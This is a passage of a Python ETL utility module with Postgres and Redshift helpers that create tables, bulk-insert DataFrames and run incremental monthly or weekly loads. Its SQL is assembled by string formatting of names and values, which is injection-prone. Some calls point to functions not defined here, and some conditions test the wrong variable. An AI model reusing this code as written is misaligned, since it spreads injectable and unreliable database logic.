# create (col1,col2,...)
columns = ",".join(df_columns)
values = "VALUES({})".format(",".join(["%s" for _ in df_columns]))
insert_stmt = "INSERT INTO {} ({}) {}".format(tbl_name, columns, values)
rptg_tstart = datetime.now()
psycopg2.extras.execute_batch(cursor, insert_stmt, df_load.values)
conn.commit()
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def make_tbl_complete_pg(cls, df, tbl_name, conn, cursor, batch_size=False):
"""
Executes a series of SQL statements to CREATE and INSERT into a table from a Pandas DataFrame.
:param df: Pandas DataFrame to create a table from.
:param tbl_name: Name of table to be created.
:param conn: Postgres database connection object.
:param cursor: Postgres database cursor object.
:param batch_size: Records to load per batch.
:return: Elapsed time to execute query.
"""
# 1 drop the table
print(f"dropping table: {tbl_name}")
try:
cls.run_query_pg(sql=f"drop table {tbl_name}", conn=conn)
except:
print(f"table doesn't exist: {tbl_name}")
pass
# create the table
print(f"creating table: {tbl_name}")
sql = cls.make_tbl_pg(df=df, tbl_name=tbl_name)
print(sql)
cls.run_query_pg(sql=sql, conn=conn)
print(f"inserting DF values into table: {tbl_name}")
rptg_tstart = datetime.now()
cls.insert_pg(df=df, tbl=tbl_name, cursor=cursor, conn=conn, batch_size=batch_size)
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def sequential_load_pg(cls,
override,
tgt_tbl,
conn,
dt_start,
dt_end,
saved_day_id_range_placeholder,
dt1_interval,
dt2_interval,
sql_loop_fn,
sql_loop_fn_type,
filter_day_id_field1=False,
sql_loop_fn_dt_placeholder1=False,
filter_day_id_field2=False,
filter_id_type2=False,
sql_loop_fn_dt_placeholder2=False,
filter_day_id_field3=False,
filter_id_type3=False,
sql_loop_fn_dt_placeholder3=False,
loop_src1=False,
loop_src2=False,
loop_src3=False,
log_dir=False):
"""
:param override:
:param tgt_tbl:
:param conn:
:param dt_start:
:param dt_end:
:param saved_day_id_range_placeholder:
:param dt1_interval:
:param dt2_interval:
:param sql_loop_fn:
:param sql_loop_fn_type:
:param filter_day_id_field1:
:param sql_loop_fn_dt_placeholder1:
:param filter_day_id_field2:
:param filter_id_type2:
:param sql_loop_fn_dt_placeholder2:
:param filter_day_id_field3:
:param filter_id_type3:
:param sql_loop_fn_dt_placeholder3:
:param loop_src1:
:param loop_src2:
:param loop_src3:
:param log_dir:
:return:
"""
# define the month startend dates to loop through
rptg_dates = pd.date_range(dt_start, dt_end, freq=dt1_interval) - pd.offsets.MonthBegin(1)
rptg_dates = [str(x)[:10] for x in rptg_dates.to_list()]
rptg_dates = pd.DataFrame({
"start_date": rptg_dates,
"end_date": rptg_dates
})
rptg_dates['end_date'] = rptg_dates['end_date'].shift(-1)
rptg_dates = rptg_dates[pd.to_datetime(rptg_dates['start_date']) <= datetime.now()].dropna()
# define the weekly start/end dates to loop thru
rptg_dates_wk = pd.date_range(dt_start, dt_end, freq=dt2_interval)
rptg_dates_wk = [str(x)[:10] for x in rptg_dates_wk.to_list()]
rptg_dates_wk = pd.DataFrame({
"start_date": rptg_dates_wk,
"end_date": rptg_dates_wk
})
rptg_dates_wk['end_date'] = rptg_dates_wk['end_date'].shift(-1)
rptg_dates_wk = rptg_dates_wk[pd.to_datetime(rptg_dates_wk['start_date']) <= datetime.now()].dropna()
# dropping table if override = True
if override:
print(f'''table override True: Dropping table: {tgt_tbl} ''')
try:
cls.run_query_pg(conn=conn, sql=f'''drop table {tgt_tbl}''')
except:
conn.commit()
pass
# getting max day id value
try:
sql = f'''select max(date(trim(substring(dt_range,regexp_instr(dt_range,'to ')+3,10)))) as day_idnt FROM {tgt_tbl}'''
saved_dates = pd.read_sql_query(sql=sql, con=conn)
except:
conn.commit()
saved_dates = pd.DataFrame({"day_idnt": ["1999-12-31"]}) # arbitrarily old date
saved_date_dt = \
datetime(
year=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[0]),
month=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[1]),
day=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[2])
).replace(day=1).strftime("%Y-%m-%d")
rptg_dates = rptg_dates[
pd.to_datetime(rptg_dates['start_date']) >= \
pd.to_datetime(saved_date_dt)].reset_index(drop=True)
print("Starting load from:")
print(rptg_dates.head(1))
rptg_freq = "M"
for idx, row in rptg_dates.iterrows():
print(f'''{row['start_date']} to {row['end_date']}''')
# if idx == 0:
# break
if idx == 0 and saved_dates['day_idnt'][0] != pd.to_datetime(row['start_date']):
print(Fore.RED + f'''latest saved data date in table is {str(saved_dates['day_idnt'][0])} ...''')
# bump up start range:
new_start = str(pd.to_datetime(str(saved_dates['day_idnt'][0])) + pd.DateOffset(1))[:10]
print(Fore.RED + f'''revising start date to: {new_start} to {row['end_date']}''')
# if its a function, pass in params
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(src=loop_src1,
src2=loop_src2,
src3=loop_src3,
start=new_start,
end=row['end_date'])
# otherwise, we will just replace strings
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{new_start} to {row['end_date']}' as dt_range,"
)
# date filters
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{new_start}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
if filter_id_type2 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{new_start}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
elif filter_id_type2 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
if filter_day_id_field3 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{new_start}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
elif filter_id_type3 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
else:
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(
start=row['start_date'],
end=row['end_date'],
src=loop_src1,
src2=loop_src2,
src3=loop_src3
)
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{row['start_date']} to {row['end_date']}' as dt_range,"
)
# date range column for logging
sql = sql.replace(
saved_day_id_range_placeholder,
f" '{row['start_date']} to {row['end_date']}' as dt_range,"
)
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{row['start_date']}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
if filter_id_type2 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{row['start_date']}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
elif filter_id_type2 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
if filter_id_type2 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{row['start_date']}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
elif filter_id_type3 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
if idx == 0 and override:
sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
else:
sql_prefix = f"INSERT INTO {tgt_tbl} "
Export.dump_sql(obj=sql_prefix + sql,
dir=log_dir + f"{tgt_tbl}_{idx}.sql")
try:
cls.run_query_pg(conn=conn, sql=sql_prefix + sql)
except Exception as e:
print(str(e))
rptg_freq = "W"
conn.commit()
break
# if the insert failed on a monthly level, cycle down to weekly level
if rptg_freq == "W":
print("Insert failed on monthly level...cycling down to weekly")
# getting max day id value
try:
sql = f'''select max(date(trim(substring(dt_range,regexp_instr(dt_range,'to ')+3,10)))) as day_idnt FROM {tgt_tbl}'''
saved_dates = pd.read_sql_query(sql=sql, con=conn)
except:
conn.commit()
saved_dates = pd.DataFrame({"day_idnt": ["1999-12-31"]}) # arbitrarily old date
saved_date_dt = \
datetime(
year=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[0]),
month=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[1]),
day=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[2])
).replace(day=1).strftime("%Y-%m-%d")
rptg_dates_wk = rptg_dates_wk[
pd.to_datetime(rptg_dates_wk['start_date']) >= \
pd.to_datetime(saved_date_dt)].reset_index(drop=True)
for idx, row in rptg_dates_wk.iterrows():
print(f'''{row['start_date']} to {row['end_date']}''')
if idx == 0 and saved_dates['day_idnt'][0] != pd.to_datetime(row['start_date']):
print(Fore.RED + f'''latest saved data date in table is {str(saved_dates['day_idnt'][0])} ...''')
# bump up start range:
new_start = str(pd.to_datetime(str(saved_dates['day_idnt'][0])) + pd.DateOffset(1))[:10]
print(Fore.RED + f'''revising start date to: {new_start} to {row['end_date']}''')
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(src=loop_src1,
src2=loop_src2,
src3=loop_src3,
start=new_start,
end=row['end_date'])
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{new_start} to {row['end_date']}' as dt_range,"
)
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{new_start}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{new_start}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{new_start}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
else:
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(
start=row['start_date'],
end=row['end_date'],
src=loop_src1,
src2=loop_src2,
src3=loop_src3
)
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{row['start_date']} to {row['end_date']}' as dt_range,"
)
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{row['start_date']}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{row['start_date']}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{row['start_date']}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
if idx == 0 and override:
sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
else:
sql_prefix = f"INSERT INTO {tgt_tbl} "
Export.dump_sql(obj=sql_prefix + sql,
dir=log_dir + f"{tgt_tbl}_{idx}.sql")
cls.run_query_pg(conn=conn, sql=sql_prefix + sql)
@classmethod
def sequential_load_pg_wk(cls,
rptg_dates,
override,
tgt_tbl,
conn,
rptg_wk,
rptg_wk_start,
rptg_wk_end,
sql_loop_fn,
# filter dates set 1
filter_dt_field1=False,
filter_dt_type1=False,
filter_dt_placeholder1=False,
# filter dates set 2
filter_dt_field2=False,
filter_dt_type2=False,
filter_dt_placeholder2=False,
# filter dates set 3
filter_dt_field3=False,
filter_dt_type3=False,
filter_dt_placeholder3=False,
log_dir=False
):
"""
:param rptg_dates:
:param override:
:param tgt_tbl:
:param conn:
:param rptg_wk:
:param rptg_wk_start:
:param rptg_wk_end:
:param sql_loop_fn:
:param filter_dt_field1:
:param filter_dt_type1:
:param filter_dt_placeholder1:
:param filter_dt_field2:
:param filter_dt_type2:
:param filter_dt_placeholder2:
:param filter_dt_field3:
:param filter_dt_type3:
:param filter_dt_placeholder3:
:param log_dir:
:return:
"""
# dropping table if override = True
if override:
print(f'''table override True: Dropping table: {tgt_tbl} ''')
try:
cls.run_query_pg(conn=conn, sql=f'''drop table {tgt_tbl}''')
except:
conn.commit()
pass
for idx, row in rptg_dates.iterrows():
print(f'''{row['start_date']} to {row['end_date']}''')
# date range column for logging
sql = sql_loop_fn.replace(
rptg_wk,
f" '{row['rptg_wk']}' as rptg_wk,"
)
sql = sql.replace(
rptg_wk_start,
f" '{row['start_date']}' as rptg_wk_start,"
)
sql = sql.replace(
rptg_wk_end,
f" '{row['end_date']}' as rptg_wk_end,"
)
# date filters
sql = sql.replace(
filter_dt_placeholder1,
f" AND date({filter_dt_field1}) > '{row['start_date']}' "
f" AND date({filter_dt_field1}) <= '{row['end_date']}'"
)
# check for other date fields
if filter_dt_placeholder2:
if filter_dt_type2 == "range":
sql = sql.replace(
filter_dt_placeholder2,
f" AND date({filter_dt_field2}) > '{row['start_date']}' "
f" AND date({filter_dt_field2}) <= '{row['end_date']}'"
)
elif filter_dt_type2 == "<=":
sql = sql.replace(
filter_dt_placeholder2,
f" AND date({filter_dt_field2}) <= '{row['end_date']}'"
)
if filter_dt_placeholder3:
if filter_dt_type3 == "range":
sql = sql.replace(
filter_dt_placeholder3,
f" AND date({filter_dt_field3}) > '{row['start_date']}' "
f" AND date({filter_dt_field3}) <= '{row['end_date']}'"
)
elif filter_dt_type3 == "<=":
sql = sql.replace(
filter_dt_placeholder3,
f" AND date({filter_dt_field3}) <= '{row['end_date']}'"
)
if idx == 0 and override:
sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
else:
sql_prefix = f"INSERT INTO {tgt_tbl} "
Export.dump_sql(obj=sql_prefix + sql,
dir=log_dir + f"{tgt_tbl}_{idx}.sql")
try:
cls.run_query_pg(conn=conn, sql=sql_prefix + sql)
except Exception as e:
print(str(e))
conn.commit()
break
class Redshift:
"""
Generic functions for Redshift SQL queries and ETL.
.. image:: ../images_source/db_etl_tools/redshift1.png
"""
@classmethod
def run_query_rs(cls, conn, sql):
"""
Executes a SQL statement with a Redshift database connection.
:param conn: Redshift database connection object,
:param sql: SQL Statement to execute.
:return: Elapsed time to execute query.
"""
rptg_tstart = datetime.now()
cur = conn.cursor()
cur.execute(sql)
conn.commit()
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def insert_val_rs(cls, col_list, val_list, tbl_name):
"""
Creates SQL to run an INSERT operation of a given Redshift table.
:param col_list: List of columns to INSERT or UPDATE.
:param val_list: List of values to INSERT or UPDATE.
:param tbl_name: Name of Postgres table.
:return: SQL to run an INSERT statement.
"""
sql = f'''
INSERT INTO {tbl_name}
(
{str(col_list).replace("[", "").replace("]", "").replace("'", "")}
) values (
{str(val_list).replace("[", "").replace("]", "")}
)
'''
return sql
@classmethod
def upsert_tbl_rs(cls, src_tbl, tgt_tbl, src_join_cols, src_insert_cols,
src_update_cols=False, update_compare_cols=False):
"""
Creates SQL to run an UPSERT (INSERT new records or UPDATE existing records) operation of a given Redshift table.
:param src_tbl: Redshift source table that contains data to be merged from.
:param tgt_tbl: Redshift target table to receive UPSERT operation.
:param src_join_cols: Columns to use to join source and target tables.
:param src_insert_cols: Columns to be inserted from source table.
:param src_update_cols: Columns to be updated from source table.
:param update_compare_cols: Columns to use to compare values across source and target tables.
:return: A SQL Insert statement and a SQL Update statement.
"""
src_join_cols_ = (
str([f"t.{c} = s.{c} AND "
for c in src_join_cols])
.replace("[", "")
.replace("]", "")
.replace("'", "")
.replace(",", "")
)
src_join_cols_ = src_join_cols_[:src_join_cols_.rfind("AND")]
src_join_cols_f = (
str([f"t.{c} IS NULL AND "
for c in src_join_cols])
.replace("[", "")
.replace("]", "")
.replace("'", "")
.replace(",", "")
)
src_join_cols_f = src_join_cols_f[:src_join_cols_f.rfind("AND")]
src_insert_cols_ = (
str([f"s.{c}"
for c in src_insert_cols])
.replace("[", "")
.replace("]", "")
.replace("'", "")
)
if src_update_cols:
src_update_cols_ = (
str([f"{c} = s.{c},"
for c in src_update_cols])
.replace("[", "")
.replace("]", "")
.replace("', '", "")
.replace("'", "")
)
src_update_cols_ = src_update_cols_[:src_update_cols_.rfind(",")]
# update join statement
src_join_cols2_ = src_join_cols_.replace("t.", f"{tgt_tbl}.")
if update_compare_cols:
update_compare_cols_ = (
str([f"s.{c} != {tgt_tbl}.{c},"
for c in update_compare_cols])
.replace("[", "")
.replace("]", "")
.replace("', '", "")
.replace("'", "")
)
update_compare_cols_ = update_compare_cols_[:update_compare_cols_.rfind(",")]
src_join_cols2_ = src_join_cols2_ + " AND " + update_compare_cols_
# src_join_cols2_ = src_join_cols2_.replace("t.", f"{tgt_tbl}.")
# https://dwgeek.com/amazon-redshift-merge-statement-alternative-and-example.html/
sql_update = f'''
/* Update records*/
UPDATE {tgt_tbl}
SET {src_update_cols_}
FROM {src_tbl} s
WHERE {src_join_cols2_}
'''.replace("\n", " ")
else:
sql_update = ""
sql_insert = f'''
/* Insert records*/
INSERT INTO {tgt_tbl}
SELECT {src_insert_cols_}
FROM {src_tbl} s
LEFT JOIN {tgt_tbl} t
ON {src_join_cols_}
WHERE {src_join_cols_f}
'''.replace("\n", " ")
return sql_update, sql_insert
@classmethod
def make_df_tbl_rs(cls, tbl_name, df):
"""
Creates SQL to run a CREATE TABLE statement based on a Pandas DataFrame.
:param tbl_name: Redshift table name.
:param df: Pandas DataFrame.
:return: CREATE TABLE SQL statement.
"""
# fix columns
df = Generic.make_db_cols(df)
# loop thru the columns
for idx, col in enumerate(df):
# find the max length of each field
col_desc = col + "-" + str(df[col].map(lambda x: len(str(x))).max())
# find the max value of each fields
try:
col_max = col + "-" + str(max(df[col]))
except:
col_max = col + "-" + 'NA'
if idx == 0:
col_desc_all = [col_desc]
col_max_all = [col_max]
else:
col_desc_all.append(col_desc)
col_max_all.append(col_max)
# make df of column lengths
col_desc_all = pd.DataFrame(col_desc_all)
col_desc_all.columns = ["char"]
col_desc_all['column'], col_desc_all['length'] = \
col_desc_all['char'].str.split('-', 1).str
# make df of column max
col_max_all = pd.DataFrame(col_max_all)
col_max_all.columns = ["char"]
col_max_all['column'], col_max_all['max'] = \
col_max_all['char'].str.split('-', 1).str
# make df of column dtypes
col_desc_types = pd.DataFrame(df.dtypes).reset_index()
col_desc_types.columns = ["column", "type"]
# join dfs
col_desc_all = pd.merge(
col_desc_all,
col_desc_types,
how="inner",
on="column")
col_desc_all = pd.merge(
col_desc_all,
col_max_all[["column", "max"]],
how="inner",
on="column")
# define data type mapping (pandas --> teradata)
d = {'object': 'VARCHAR',
'int64': 'INTEGER',
'Int64': 'INTEGER',
'int32': 'INTEGER',
'bool': 'VARCHAR',
'float64': 'FLOAT',
'datetime64[ns]': 'TIMESTAMP',
"datetime64[ns, UTC]": "TIMESTAMP"}
col_desc_all = col_desc_all.astype(str).replace(d)
# list the columns where you want to specify the lengths
col_desc_all['concat'] = np.where(
# if varchar, use the length of the longest char
col_desc_all['type'] == "VARCHAR",
col_desc_all['column'] + " " + \
col_desc_all['type'].astype(str) + \
"(" + col_desc_all['length'] + ")",
col_desc_all['column'] + " " + \
col_desc_all['type'].astype(str))
# convert integers with a max val over certain amount to varchar
for idx, row in col_desc_all.iterrows():
if str(row['type']) == 'INTEGER' and row['max'] != "nan" and int(row['max']) > 2147483647:
val = row['concat']
col_desc_all.loc[idx, 'concat'] = \
val.replace(
" INTEGER",
f" VARCHAR({row['length']})")
col_desc_all = col_desc_all.apply(', '.join).reset_index()
col_desc_all.columns = ["index", "statement"]
statement = col_desc_all[col_desc_all['index'] == 'concat']
sql = statement['statement'].values
sql = str(sql)
sql = sql.replace("[", "")
sql = sql.replace("]", "")
sql = "CREATE TABLE " + tbl_name + " ( " + sql + " )"
sql = sql.replace("'", "")
return sql
@classmethod
def insert_df_rs(cls, cursor, conn, df, tbl_name):
"""
Executes an INSERT INTO statement for a given Pandas DataFrame into a Redshift table..
:param cursor: Redshift database cursor object.
:param conn: Redshift database connection object.
:param df: Pandas DataFrame to insert into a Redshift table.
:param tbl_name: Redshift table name.
:return: Elapsed time to execute query.
"""
df_load = df.replace({pd.np.nan: None})
df_load = df_load.round(3)
df_columns = list(df_load)
# create (col1,col2,...)
columns = ",".join(df_columns)
values = "VALUES({})".format(",".join(["%s" for _ in df_columns]))
insert_stmt = "INSERT INTO {} ({}) {}".format(tbl_name, columns, values)
rptg_tstart = datetime.now()
psycopg2.extras.execute_batch(cursor, insert_stmt, df_load.values)
conn.commit()
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def make_tbl_complete_rs(cls, df, tbl_name, conn, cursor, batch_size=False):
"""
Executes a series of SQL statements to CREATE and INSERT into a table from a Pandas DataFrame.
:param df: Pandas DataFrame to create a table from.
:param tbl_name: Name of table to be created.
:param conn: Redshift database connection object.
:param cursor: Redshift database cursor object.
:param batch_size: Records to load per batch.
:return: Elapsed time to execute query.
"""
# 1 drop the table
print(f"dropping table: {tbl_name}")
try:
cls.run_query_rs(sql=f"drop table {tbl_name}", conn=conn)
except:
print(f"table doesn't exist: {tbl_name}")
pass
# create the table
print(f"creating table: {tbl_name}")
sql = cls.make_tbl_rs(df=df, tbl_name=tbl_name)
print(sql)
cls.run_query_rs(sql=sql, conn=conn)
print(f"inserting DF values into table: {tbl_name}")
rptg_tstart = datetime.now()
cls.insert_rs(df=df, tbl=tbl_name, cursor=cursor, conn=conn, batch_size=batch_size)
rptg_tend = datetime.now()
tdelta = rptg_tend - rptg_tstart
tdelta = tdelta.total_seconds() / 60
print(Fore.RED + f"Runtime: {tdelta}")
@classmethod
def sequential_load_rs(cls,
override,
tgt_tbl,
conn,
dt_start,
dt_end,
saved_day_id_range_placeholder,
dt1_interval,
dt2_interval,
sql_loop_fn,
sql_loop_fn_type,
filter_day_id_field1=False,
sql_loop_fn_dt_placeholder1=False,
filter_day_id_field2=False,
filter_id_type2=False,
sql_loop_fn_dt_placeholder2=False,
filter_day_id_field3=False,
filter_id_type3=False,
sql_loop_fn_dt_placeholder3=False,
loop_src1=False,
loop_src2=False,
loop_src3=False,
log_dir=False):
"""
:param override:
:param tgt_tbl:
:param conn:
:param dt_start:
:param dt_end:
:param saved_day_id_range_placeholder:
:param dt1_interval:
:param dt2_interval:
:param sql_loop_fn:
:param sql_loop_fn_type:
:param filter_day_id_field1:
:param sql_loop_fn_dt_placeholder1:
:param filter_day_id_field2:
:param filter_id_type2:
:param sql_loop_fn_dt_placeholder2:
:param filter_day_id_field3:
:param filter_id_type3:
:param sql_loop_fn_dt_placeholder3:
:param loop_src1:
:param loop_src2:
:param loop_src3:
:param log_dir:
:return:
"""
# define the month startend dates to loop through
rptg_dates = pd.date_range(dt_start, dt_end, freq=dt1_interval) - pd.offsets.MonthBegin(1)
rptg_dates = [str(x)[:10] for x in rptg_dates.to_list()]
rptg_dates = pd.DataFrame({
"start_date": rptg_dates,
"end_date": rptg_dates
})
rptg_dates['end_date'] = rptg_dates['end_date'].shift(-1)
rptg_dates = rptg_dates[pd.to_datetime(rptg_dates['start_date']) <= datetime.now()].dropna()
# define the weekly start/end dates to loop thru
rptg_dates_wk = pd.date_range(dt_start, dt_end, freq=dt2_interval)
rptg_dates_wk = [str(x)[:10] for x in rptg_dates_wk.to_list()]
rptg_dates_wk = pd.DataFrame({
"start_date": rptg_dates_wk,
"end_date": rptg_dates_wk
})
rptg_dates_wk['end_date'] = rptg_dates_wk['end_date'].shift(-1)
rptg_dates_wk = rptg_dates_wk[pd.to_datetime(rptg_dates_wk['start_date']) <= datetime.now()].dropna()
# dropping table if override = True
if override:
print(f'''table override True: Dropping table: {tgt_tbl} ''')
try:
cls.run_query_rs(conn=conn, sql=f'''drop table {tgt_tbl}''')
except:
conn.commit()
pass
# getting max day id value
try:
sql = f'''select max(date(trim(substring(dt_range,regexp_instr(dt_range,'to ')+3,10)))) as day_idnt FROM {tgt_tbl}'''
saved_dates = pd.read_sql_query(sql=sql, con=conn)
except:
conn.commit()
saved_dates = pd.DataFrame({"day_idnt": ["1999-12-31"]}) # arbitrarily old date
saved_date_dt = \
datetime(
year=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[0]),
month=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[1]),
day=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[2])
).replace(day=1).strftime("%Y-%m-%d")
rptg_dates = rptg_dates[
pd.to_datetime(rptg_dates['start_date']) >= \
pd.to_datetime(saved_date_dt)].reset_index(drop=True)
print("Starting load from:")
print(rptg_dates.head(1))
rptg_freq = "M"
for idx, row in rptg_dates.iterrows():
print(f'''{row['start_date']} to {row['end_date']}''')
# if idx == 0:
# break
if idx == 0 and saved_dates['day_idnt'][0] != pd.to_datetime(row['start_date']):
print(Fore.RED + f'''latest saved data date in table is {str(saved_dates['day_idnt'][0])} ...''')
# bump up start range:
new_start = str(pd.to_datetime(str(saved_dates['day_idnt'][0])) + pd.DateOffset(1))[:10]
print(Fore.RED + f'''revising start date to: {new_start} to {row['end_date']}''')
# if its a function, pass in params
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(src=loop_src1,
src2=loop_src2,
src3=loop_src3,
start=new_start,
end=row['end_date'])
# otherwise, we will just replace strings
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{new_start} to {row['end_date']}' as dt_range,"
)
# date filters
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{new_start}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
if filter_id_type2 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{new_start}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
elif filter_id_type2 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
if filter_day_id_field3 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{new_start}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
elif filter_id_type3 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
else:
if sql_loop_fn_type == "fn":
sql = sql_loop_fn(
start=row['start_date'],
end=row['end_date'],
src=loop_src1,
src2=loop_src2,
src3=loop_src3
)
else:
# date range column for logging
sql = sql_loop_fn.replace(
saved_day_id_range_placeholder,
f" '{row['start_date']} to {row['end_date']}' as dt_range,"
)
# date range column for logging
sql = sql.replace(
saved_day_id_range_placeholder,
f" '{row['start_date']} to {row['end_date']}' as dt_range,"
)
sql = sql.replace(
sql_loop_fn_dt_placeholder1,
f" AND date({filter_day_id_field1}) >= '{row['start_date']}' AND date({filter_day_id_field1}) < '{row['end_date']}'"
)
# check for other date fields
if sql_loop_fn_dt_placeholder2:
if filter_id_type2 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) >= '{row['start_date']}' AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
elif filter_id_type2 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder2,
f" AND date({filter_day_id_field2}) < '{row['end_date']}'"
)
if sql_loop_fn_dt_placeholder3:
if filter_id_type2 == "range":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) >= '{row['start_date']}' AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
elif filter_id_type3 == "<":
sql = sql.replace(
sql_loop_fn_dt_placeholder3,
f" AND date({filter_day_id_field3}) < '{row['end_date']}'"
)
if idx == 0 and override:
sql_prefix = f"CREATE TABLE {tgt_tbl} AS "
else:
sql_prefix = f"INSERT INTO {tgt_tbl} "
Export.dump_sql(obj=sql_prefix + sql,
dir=log_dir + f"{tgt_tbl}_{idx}.sql")
try:
cls.run_query_rs(conn=conn, sql=sql_prefix + sql)
except Exception as e:
print(str(e))
rptg_freq = "W"
conn.commit()
break
# if the insert failed on a monthly level, cycle down to weekly level
if rptg_freq == "W":
print("Insert failed on monthly level...cycling down to weekly")
# getting max day id value
try:
sql = f'''select max(date(trim(substring(dt_range,regexp_instr(dt_range,'to ')+3,10)))) as day_idnt FROM {tgt_tbl}'''
saved_dates = pd.read_sql_query(sql=sql, con=conn)
except:
conn.commit()
saved_dates = pd.DataFrame({"day_idnt": ["1999-12-31"]}) # arbitrarily old date
saved_date_dt = \
datetime(
year=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[0]),
month=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[1]),
day=int(str(saved_dates['day_idnt'].astype(str).values[0]).split("-")[2])
).replace(day=1).strftime("%Y-%m-%d")
rptg_dates_wk = rptg_dates_wk[
pd.to_datetime(rptg_dates_wk['start_date']) >= \
pd.to_datetime(saved_date_dt)].reset_index(drop=True)
for idx, row in rptg_dates_wk.iterrows():
print(f'''{row['start_date']} to {row['end_date']}''')
